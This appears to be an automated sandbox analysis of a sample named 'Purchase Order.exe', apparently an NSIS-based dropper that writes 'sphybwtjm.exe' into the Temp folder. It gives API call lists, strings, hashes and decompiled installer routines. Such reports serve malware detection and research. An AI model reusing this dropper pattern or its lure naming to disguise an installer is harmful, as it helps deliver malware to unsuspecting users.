Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937

GetUserDefaultUILanguage.KERNELBASE(00000002,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,00000000,?), ref: 00403C06

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
lstrlenW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe",?,?,?,"C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe",00000000,C:\Users\user~1\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,772EFAA0), ref: 00403CED
lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe",?,?,?,"C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe",00000000,C:\Users\user~1\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
GetFileAttributesW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe",?,00000000,?), ref: 00403D0B
LoadImageW.USER32 ref: 00403D54
RegisterClassW.USER32 ref: 00403D91
SystemParametersInfoW.USER32 ref: 00403DA9
CreateWindowExW.USER32 ref: 00403DDE
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
GetClassInfoW.USER32 ref: 00403E40
GetClassInfoW.USER32 ref: 00403E4D
RegisterClassW.USER32 ref: 00403E56
DialogBoxParamW.USER32 ref: 00403E75

Strings

1033, xrefs: 00403C0C, 00403C68
RichEdit20W, xrefs: 00403E38, 00403E3E
Control Panel\Desktop\ResourceLocale, xrefs: 00403C20
RichEd32, xrefs: 00403E28
"C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe", xrefs: 00403CB4, 00403CBD, 00403CCB, 00403D1A, 00403D20
_Nb, xrefs: 00403D70, 00403DD8
.DEFAULT\Control Panel\International, xrefs: 00403C58
C:\Users\user~1\AppData\Local\Temp, xrefs: 00403C7C, 00403C84, 00403D27, 00403D2D, 00403D3D
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403BF1
RichEd20, xrefs: 00403E1A
RichEdit, xrefs: 00403E47
.exe, xrefs: 00403CFA

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-4285009550
Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\frontdesk\\Desktop\\Purchase Order.exe";
				 *0x434f0c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\frontdesk\\Desktop\\Purchase Order.exe", 0x400);
				_t89 = E0040602D(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\frontdesk\\Desktop";
				E0040653D(L"C:\\Users\\frontdesk\\Desktop", _t91);
				E0040653D(0x444000, E00405E58(_t92));
				_t50 = GetFileSize(_t89, 0);
				 *0x42aa24 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					if( *0x434f14 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x40387d
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034E5( *0x434f14 + 0x1c);
						_t35 =  &_v24; // 0x40387d
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						if(_t57 == _v24) {
							 *0x434f10 = _t94;
							 *0x434f18 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x434f1c =  *0x434f1c + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FE8(0x434f20, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E004034E5( *0x41ea18);
					if(E004034CF( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E004034CF(0x416a18, _t90) == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x434f14 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FE8( &_v44, 0x416a18, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x41ea18; // 0x4086a
							 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x434f14 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t93 = _t80 - 4;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x42aa24) {
							_v12 = E004069F7(_v12, 0x416a18, _t90);
						}
						 *0x41ea18 =  *0x41ea18 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}

0x00403085
0x00403088
0x0040308b
0x0040308e
0x00403094
0x004030a5
0x004030aa
0x004030bd
0x004030c2
0x004030c5
0x004030cb
0x00000000
0x004030cd
0x004030d8
0x004030de
0x004030ef
0x004030f6
0x004030fe
0x00403103
0x00403105
0x004031f0
0x004031f2
0x004031fe
0x00000000
0x00000000
0x00403203
0x00403227
0x00403227
0x0040322c
0x00403232
0x0040323d
0x00403242
0x00403242
0x00403245
0x00403246
0x00403247
0x00403249
0x00403251
0x00403268
0x00403270
0x00403275
0x00403277
0x00403277
0x0040327f
0x0040327f
0x00403282
0x00403283
0x00403283
0x00403286
0x00403288
0x00403288
0x00403292
0x00403298
0x004032a6
0x00000000
0x004032ab
0x00000000
0x00403251
0x0040320b
0x0040321d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040310b
0x00403110
0x00403115
0x00403119
0x00403120
0x00403127
0x00403129
0x00403129
0x00403134
0x0040325c
0x00403253
0x00000000
0x00403253
0x00403141
0x004031c1
0x004031c5
0x004031ca
0x00000000
0x004031c1
0x0040314a
0x0040314f
0x00403157
0x0040317d
0x00403183
0x0040318c
0x00403192
0x00403197
0x0040319d
0x00000000
0x00000000
0x004031a7
0x004031af
0x004031b2
0x004031b7
0x004031b9
0x004031b9
0x00000000
0x00000000
0x00000000
0x00000000
0x004031a7
0x004031cb
0x004031d1
0x004031dd
0x004031dd
0x004031e0
0x004031e6
0x004031e6
0x004031ee
0x00000000
0x004031ee

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order.exe,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C

Strings

}8@, xrefs: 00403227, 00403242
Error launching installer, xrefs: 004030CD
soft, xrefs: 0040316B
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
C:\Users\user\Desktop\Purchase Order.exe, xrefs: 00403094, 004030A3, 004030B7, 004030D7
C:\Users\user\Desktop, xrefs: 004030D8, 004030DD, 004030E3
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403084
Null, xrefs: 00403174
Inst, xrefs: 00403162

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
API String ID: 2803837635-3040752455
Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x422a20;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004034E5( *0x434f58 + _t62);
				}
				if(E004034CF( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004034CF(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004034CF(0x41ea20, _t98) == 0) {
								goto L41;
							}
							_t69 = E004060DF(_a8, 0x41ea20, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40d384 =  *0x40d384 & 0x00000000;
					 *0x40d380 =  *0x40d380 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce68 = 8;
					 *0x416a10 = 0x40ea08;
					 *0x416a0c = 0x40ea08;
					 *0x416a08 = 0x416a08;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004034CF(0x41ea20, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40ce58 = 0x41ea20;
						 *0x40ce5c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40ce60 = _t95;
							 *0x40ce64 = _v12;
							_t75 = E00406A65(0x40ce58);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40ce60; // 0x423303
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040559F(0,  &_v152);
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40ce60; // 0x423303
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E004060DF(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x004032bf
0x004032c3
0x004032c6
0x004032cb
0x004032cd
0x004032cd
0x004032d4
0x004032d8
0x004032dd
0x004032df
0x004032df
0x004032e6
0x004032eb
0x004032f6
0x004032f6
0x00403308
0x004034bd
0x004034bd
0x00000000
0x0040330e
0x00403312
0x0040346a
0x004034ad
0x004034af
0x004034af
0x004034bb
0x004034c2
0x004034c5
0x00000000
0x00000000
0x00000000
0x00000000
0x004034bb
0x0040346f
0x00000000
0x00000000
0x00403471
0x00403474
0x00403477
0x0040347a
0x0040347c
0x0040347c
0x0040348c
0x00000000
0x00000000
0x00403493
0x0040349a
0x00403464
0x00403464
0x004034bf
0x004034bf
0x00000000
0x004034bf
0x0040349c
0x0040349f
0x004034a6
0x00000000
0x00000000
0x00000000
0x004034a8
0x00000000
0x00403474
0x0040331e
0x00403320
0x00403327
0x0040332e
0x0040332e
0x00403335
0x0040333d
0x00403347
0x0040334c
0x00403354
0x0040335e
0x00403361
0x00000000
0x00000000
0x00000000
0x00000000
0x00403367
0x00403367
0x00403367
0x0040336f
0x00403371
0x00403371
0x00403382
0x00000000
0x00000000
0x00403388
0x0040338b
0x00403391
0x00403397
0x00403397
0x004033a2
0x004033a8
0x004033ad
0x004033b4
0x004033b7
0x00000000
0x00000000
0x004033bd
0x004033c3
0x004033c5
0x004033ce
0x004033d0
0x00403401
0x00403407
0x00403413
0x00403418
0x00403418
0x0040341d
0x00403458
0x00000000
0x00000000
0x00000000
0x0040341f
0x00403423
0x0040343a
0x0040343f
0x00403442
0x00403445
0x00403448
0x0040344c
0x00000000
0x00000000
0x00000000
0x00403452
0x0040342c
0x00403433
0x00000000
0x00000000
0x00403435
0x00000000
0x00403435
0x0040341d
0x00403460
0x00000000
0x00403460
0x00000000
0x00403367

APIs

GetTickCount.KERNEL32 ref: 0040331E
GetTickCount.KERNEL32 ref: 004033C5
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033EE
wsprintfW.USER32 ref: 00403401

Strings

A, xrefs: 0040347E
}8@, xrefs: 004032B4
... %d%%, xrefs: 004033FB
*B, xrefs: 004032DF
A, xrefs: 00403374

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ A$ A$... %d%%$}8@
API String ID: 551687249-3029848762
Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E83( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"\"C:\\User";
				if(_t35 == 0) {
					lstrcatW(E00405E0C(E0040653D(_t81, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp")), ??);
				} else {
					E0040653D();
				}
				E004067C4(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406873(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406008(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E0040559F(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x434f88;
						goto L32;
					} else {
						E0040653D(0x40b5f0, _t83);
						E0040653D(_t83, _t81);
						E0040657A(_t77, _t81, _t83, "C:\Users\FRONTD~1\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040653D(_t83, 0x40b5f0);
						_t64 = E00405B9D("C:\Users\FRONTD~1\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E0040559F();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E0040559F(0xffffffea,  *(_t86 - 8));
				 *0x434fb4 =  *0x434fb4 + 1;
				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x434fb4 =  *0x434fb4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B9D();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe","C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe",00000000,00000000,"C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe",C:\Users\user~1\AppData\Local\Temp,?,?,00000031), ref: 004017D5

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,00423303,772EEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,00423303,772EEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Strings

C:\Users\user~1\AppData\Local\Temp, xrefs: 00401835, 00401851
C:\Users\user~1\AppData\Local\Temp, xrefs: 0040179E
"C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe", xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906

Memory Dump Source

Source File: 00000000.00000002.268584154.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.268576745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268603635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268660274.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268683181.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268818821.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268829357.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268851109.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268933577.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "C:\Users\user~1\AppData\Local\Temp\sphybwtjm.exe"$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp
API String ID: 1941528284-2275860657
Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
